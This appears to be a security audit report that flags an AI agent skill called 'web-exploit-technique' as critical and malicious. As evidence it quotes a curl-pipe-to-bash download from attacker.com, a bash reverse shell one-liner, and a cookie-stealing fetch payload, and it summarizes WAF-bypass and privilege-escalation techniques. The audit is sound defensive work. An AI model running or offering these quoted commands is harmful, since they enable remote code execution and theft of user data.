web-exploit-technique
Fail
Audited by Gen Agent Trust Hub on Sep 5, 2026
Risk Level: CRITICALREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONOBFUSCATIONPRIVILEGE_ESCALATIONDATA_EXFILTRATION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill contains a confirmed pattern of downloading and executing a remote shell script directly into bash (
curl http://attacker.com/shell.sh | bash). This is a critical security risk as it allows for arbitrary code execution from a third-party server. - [COMMAND_EXECUTION]: The skill provides numerous reverse shell one-liners for various languages (Bash, Python, PowerShell) designed to establish interactive connections to an attacker-controlled host (e.g.,
bash -i >& /dev/tcp/<lhost>/<lport> 0>&1). - [OBFUSCATION]: The skill documents techniques for bypassing Web Application Firewalls (WAFs) using Base64 encoding, URL double-encoding, and character substitutions to hide malicious payloads from security scanners.
- [PRIVILEGE_ESCALATION]: Instructions include techniques for exploiting
sudoNOPASSWD rules and using database privileges (DBA/FILE) to achieve OS-level command execution viasqlmaporxp_cmdshell. - [DATA_EXFILTRATION]: The skill provides payloads for exfiltrating sensitive data (cookies, database content, local storage) to external domains (e.g.,
fetch('https://attacker.com/steal?c='+document.cookie)).
Recommendations
- CRITICAL: 1 infected file(s) detected - DO NOT USE
- HIGH: Downloads and executes remote code from: http://attacker.com/shell.sh - DO NOT USE without thorough review
- AI detected serious security threats
- Contains 1 malicious URL(s) - DO NOT USE
- CRITICAL: 1 obfuscated URL(s) are MALICIOUS: https://legitimate.com/../../attacker.com - DO NOT USE
Audit Metadata